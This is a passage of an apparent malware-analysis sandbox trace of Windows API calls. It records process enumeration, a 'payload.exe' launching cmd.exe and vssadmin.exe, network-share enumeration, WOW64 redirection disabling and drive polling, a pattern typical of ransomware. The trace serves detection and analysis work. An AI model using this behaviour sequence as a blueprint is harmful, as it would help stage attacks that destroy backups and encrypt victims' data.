(lpString="svchost.exe") returned 11 [0060.067] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.067] lstrlenW (lpString="svchost.exe") returned 11 [0060.068] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0060.068] lstrlenW (lpString="dwm.exe") returned 7 [0060.068] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0060.069] lstrlenW (lpString="explorer.exe") returned 12 [0060.069] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0060.069] lstrlenW (lpString="spoolsv.exe") returned 11 [0060.070] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0060.070] lstrlenW (lpString="taskhost.exe") returned 12 [0060.070] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.071] lstrlenW (lpString="svchost.exe") returned 11 [0060.071] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0060.072] lstrlenW (lpString="taskeng.exe") returned 11 [0060.072] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0060.072] lstrlenW (lpString="taskhost.exe") returned 12 [0060.072] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="carried trinity.exe")) returned 1 [0060.073] lstrlenW (lpString="carried trinity.exe") returned 19 [0060.073] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="heaven.exe")) returned 1 [0060.073] lstrlenW (lpString="heaven.exe") returned 10 [0060.074] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dell.exe")) returned 1 [0060.074] lstrlenW (lpString="dell.exe") returned 8 [0060.074] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="consequence lonely nato.exe")) returned 1 [0060.075] lstrlenW (lpString="consequence lonely nato.exe") returned 27 [0060.075] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gotten_commit_philip.exe")) returned 1 [0060.076] lstrlenW (lpString="gotten_commit_philip.exe") returned 24 [0060.076] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="til ear equal.exe")) returned 1 [0060.076] lstrlenW (lpString="til ear equal.exe") returned 17 [0060.076] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="itunes-bring.exe")) returned 1 [0060.077] lstrlenW (lpString="itunes-bring.exe") returned 16 [0060.077] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tide_instances_ee.exe")) returned 1 [0060.078] lstrlenW (lpString="tide_instances_ee.exe") returned 21 [0060.078] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="philadelphia.exe")) returned 1 [0060.079] lstrlenW (lpString="philadelphia.exe") returned 16 [0060.079] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="litigation_rows_careers.exe")) returned 1 [0060.079] lstrlenW (lpString="litigation_rows_careers.exe") returned 27 [0060.079] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ict virginia cameras.exe")) returned 1 [0060.080] lstrlenW (lpString="ict virginia cameras.exe") returned 24 [0060.080] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x438, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fraud stuck.exe")) returned 1 [0060.080] lstrlenW (lpString="fraud stuck.exe") returned 15 [0060.081] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovative-essential-very.exe")) returned 1 [0060.081] lstrlenW (lpString="innovative-essential-very.exe") returned 29 [0060.081] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attended.exe")) returned 1 [0060.082] lstrlenW (lpString="attended.exe") returned 12 [0060.082] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tolerance-cartridges.exe")) returned 1 [0060.083] lstrlenW (lpString="tolerance-cartridges.exe") returned 24 [0060.083] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pan physician.exe")) returned 1 [0060.083] lstrlenW (lpString="pan physician.exe") returned 17 [0060.083] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yesterday_sagem_indexes.exe")) returned 1 [0060.084] lstrlenW (lpString="yesterday_sagem_indexes.exe") returned 27 [0060.084] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="graphsheadlinehull.exe")) returned 1 [0060.085] lstrlenW (lpString="graphsheadlinehull.exe") returned 22 [0060.085] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="over-celebrity.exe")) returned 1 [0060.085] lstrlenW (lpString="over-celebrity.exe") returned 18 [0060.085] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0060.086] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0060.086] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0060.087] lstrlenW (lpString="payload.exe") returned 11 [0060.087] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x964, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0060.087] lstrlenW (lpString="cmd.exe") returned 7 [0060.087] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0060.088] lstrlenW (lpString="conhost.exe") returned 11 [0060.088] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x970, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0060.089] lstrlenW (lpString="vssadmin.exe") returned 12 [0060.089] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0060.089] lstrlenW (lpString="VSSVC.exe") returned 9 [0060.090] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.297] lstrlenW (lpString="svchost.exe") returned 11 [0060.298] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b0, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0060.298] lstrlenW (lpString="LogonUI.exe") returned 11 [0060.299] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b0, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 0 [0060.299] CloseHandle (hObject=0x240) returned 1 [0060.299] Sleep (dwMilliseconds=0x1f4) Thread: id = 5 os_tid = 0x97c [0031.579] WaitForSingleObject (hHandle=0x18fde4, dwMilliseconds=0xffffffff) returned 0xffffffff [0031.579] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x604a38 | out: hHeap=0x5d0000) returned 1 Thread: id = 6 os_tid = 0x980 [0031.580] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x604a38 [0031.580] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x604a38, Size=0x20) returned 0x605b18 [0031.580] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x605b18, Size=0x40) returned 0x606ba8 [0031.580] GetLogicalDrives () returned 0x4 [0031.580] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x62d440 [0032.194] GetComputerNameW (in: lpBuffer=0x62d444, nSize=0x23aff6c | out: lpBuffer="XDUWTFONO", nSize=0x23aff6c) returned 1 [0032.195] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1000) returned 0x6230a8 [0032.195] WNetOpenEnumW (in: dwScope=0x3, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x23aff3c | out: lphEnum=0x23aff3c*=0x6060c8) returned 0x0 [0032.195] WNetEnumResourceW (in: hEnum=0x6060c8, lpcCount=0x23aff38, lpBuffer=0x6230a8, lpBufferSize=0x23aff40 | out: lpcCount=0x23aff38, lpBuffer=0x6230a8, lpBufferSize=0x23aff40) returned 0x103 [0032.196] WNetCloseEnum (hEnum=0x6060c8) returned 0x0 [0032.196] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x23aff3c | out: lphEnum=0x23aff3c*=0x6c3fa8) returned 0x0 [0034.648] WNetEnumResourceW (in: hEnum=0x6c3fa8, lpcCount=0x23aff38, lpBuffer=0x6230a8, lpBufferSize=0x23aff40 | out: lpcCount=0x23aff38, lpBuffer=0x6230a8, lpBufferSize=0x23aff40) returned 0x0 [0034.648] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1000) returned 0x38504f8 [0034.648] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x6230a8, lphEnum=0x23aff10 | out: lphEnum=0x23aff10*=0x606368) returned 0x0 [0035.079] WNetEnumResourceW (in: hEnum=0x606368, lpcCount=0x23aff0c, lpBuffer=0x38504f8, lpBufferSize=0x23aff14 | out: lpcCount=0x23aff0c, lpBuffer=0x38504f8, lpBufferSize=0x23aff14) returned 0x103 [0035.079] WNetCloseEnum (hEnum=0x606368) returned 0x0 [0035.079] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1000) returned 0x61e060 [0035.079] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x6230c8, lphEnum=0x23aff10 | out: lphEnum=0x23aff10*=0x0) returned 0x4b8 [0056.951] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1000) returned 0x3f98150 [0056.951] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x6230e8, lphEnum=0x23aff10 | out: lphEnum=0x23aff10*=0x0) returned 0x4c6 [0057.166] WNetEnumResourceW (in: hEnum=0x6c3fa8, lpcCount=0x23aff38, lpBuffer=0x6230a8, lpBufferSize=0x23aff40 | out: lpcCount=0x23aff38, lpBuffer=0x6230a8, lpBufferSize=0x23aff40) returned 0x103 [0057.166] WNetCloseEnum (hEnum=0x6c3fa8) returned 0x0 [0057.166] GetLogicalDrives () returned 0x4 [0057.166] Sleep (dwMilliseconds=0x64) [0057.359] GetLogicalDrives () returned 0x4 [0057.359] Sleep (dwMilliseconds=0x64) [0057.633] GetLogicalDrives () returned 0x4 [0057.634] Sleep (dwMilliseconds=0x64) [0058.101] GetLogicalDrives () returned 0x4 [0058.101] Sleep (dwMilliseconds=0x64) [0058.284] GetLogicalDrives () returned 0x4 [0058.284] Sleep (dwMilliseconds=0x64) [0058.663] GetLogicalDrives () returned 0x4 [0058.664] Sleep (dwMilliseconds=0x64) [0058.873] GetLogicalDrives () returned 0x4 [0058.873] Sleep (dwMilliseconds=0x64) [0059.917] GetLogicalDrives () returned 0x4 [0059.918] Sleep (dwMilliseconds=0x64) [0060.222] GetLogicalDrives () returned 0x4 [0060.222] Sleep (dwMilliseconds=0x64) [0060.630] GetLogicalDrives () returned 0x4 [0060.630] Sleep (dwMilliseconds=0x64) [0060.909] GetLogicalDrives () returned 0x4 [0060.909] Sleep (dwMilliseconds=0x64) Thread: id = 7 os_tid = 0x984 [0032.944] GetTickCount () returned 0x183cf [0032.944] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x24) returned 0x65e160 [0032.944] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x65e160, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x114 [0032.945] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x65e160, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x128 [0032.945] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x65e160, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x12c [0032.947] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x65e160, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x130 [0032.947] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x6700b8 [0032.947] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6700b8, Size=0x20) returned 0x605d20 [0032.947] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x6700b8 [0032.947] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6700b8, Size=0x20) returned 0x605d48 [0032.948] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0032.948] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0032.948] Wow64DisableWow64FsRedirection (in: OldValue=0x24aff84 | out: OldValue=0x24aff84*=0x0) returned 1 [0032.948] lstrlenW (lpString="kernel32.dll") returned 12 [0032.948] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x605d20 | out: hHeap=0x5d0000) returned 1 [0032.948] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0032.948] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x605d48 | out: hHeap=0x5d0000) returned 1 [0032.948] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0x60b430, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x134 [0032.949] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0033.136] GetTickCount () returned 0x1844b [0033.136] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0033.972] GetTickCount () returned 0x18507 [0033.973] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0034.110] GetTickCount () returned 0x18593 [0034.110] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0034.404] GetTickCount () returned 0x1869c [0034.404] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0034.549] GetTickCount () returned 0x18729 [0034.549] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0034.807] GetTickCount () returned 0x18832 [0034.807] GetTickCount () returned 0x18832 [0034.807] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0035.151] GetTickCount () returned 0x1894b [0035.151] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0035.409] GetTickCount () returned 0x18a44 [0035.410] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0035.896] GetTickCount () returned 0x18c37 [0035.896] GetTickCount () returned 0x18c37 [0035.896] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0036.319] GetTickCount () returned 0x18dbd [0036.319] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0036.490] GetTickCount () returned 0x18e69 [0036.490] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0036.704] GetTickCount () returned 0x18f34 [0036.704] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0036.899] GetTickCount () returned 0x18fff [0036.899] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0037.455] GetTickCount () returned 0x19230 [0037.455] GetTickCount () returned 0x19230 [0037.455] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0037.905] GetTickCount () returned 0x193e5 [0037.905] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0038.725] GetTickCount () returned 0x19645 [0038.725] GetTickCount () returned 0x19645 [0038.725] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0039.093] GetTickCount () returned 0x19710 [0039.093] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0039.468] GetTickCount () returned 0x19848 [0039.468] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0039.717] GetTickCount () returned 0x19942 [0039.717] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0040.046] GetTickCount () returned 0x19a89 [0040.046] GetTickCount () returned 0x19a89 [0040.046] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0040.361] GetTickCount () returned 0x19ba2 [0040.361] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0040.835] GetTickCount () returned 0x19d57 [0040.835] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0041.167] GetTickCount () returned 0x19e70 [0041.167] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0041.294] GetTickCount () returned 0x19efc [0041.295] GetTickCount () returned 0x19efc [0041.295] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0041.708] GetTickCount () returned 0x1a092 [0041.708] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0042.019] GetTickCount () returned 0x1a1ca [0042.019] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0042.322] GetTickCount () returned 0x1a2e3 [0042.323] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0042.768] GetTickCount () returned 0x1a497 [0042.768] GetTickCount () returned 0x1a497 [0042.769] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0043.038] GetTickCount () returned 0x1a581 [0043.038] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0043.572] GetTickCount () returned 0x1a7a3 [0043.572] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0043.996] GetTickCount () returned 0x1a949 [0043.996] GetTickCount () returned 0x1a949 [0043.996] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0044.538] GetTickCount () returned 0x1ab6b [0044.538] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0044.987] GetTickCount () returned 0x1ad00 [0044.987] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0045.404] GetTickCount () returned 0x1ae86 [0045.404] GetTickCount () returned 0x1ae86 [0045.404] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0045.532] GetTickCount () returned 0x1af03 [0045.532] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0045.816] GetTickCount () returned 0x1b02b [0045.816] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0046.244] GetTickCount () returned 0x1b1d1 [0046.244] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0046.636] GetTickCount () returned 0x1b357 [0046.636] GetTickCount () returned 0x1b357 [0046.636] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0046.912] GetTickCount () returned 0x1b450 [0046.912] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0047.187] GetTickCount () returned 0x1b559 [0047.187] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0047.343] GetTickCount () returned 0x1b5f5 [0047.343] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0047.599] GetTickCount () returned 0x1b6ff [0047.599] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0048.340] GetTickCount () returned 0x1b9dc [0048.340] GetTickCount () returned 0x1b9dc [0048.340] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0048.824] GetTickCount () returned 0x1bbbf [0048.824] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0049.078] GetTickCount () returned 0x1bcc9 [0049.078] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0049.420] GetTickCount () returned 0x1be20 [0049.420] GetTickCount () returned 0x1be20 [0049.421] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0049.962] GetTickCount () returned 0x1c032 [0049.962] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0050.327] GetTickCount () returned 0x1c1a9 [0050.327] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0050.542] GetTickCount () returned 0x1c273 [0050.542] GetTickCount () returned 0x1c273 [0050.542] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0050.708] GetTickCount () returned 0x1c31f [0050.708] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0050.978] GetTickCount () returned 0x1c428 [0050.978] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0051.599] 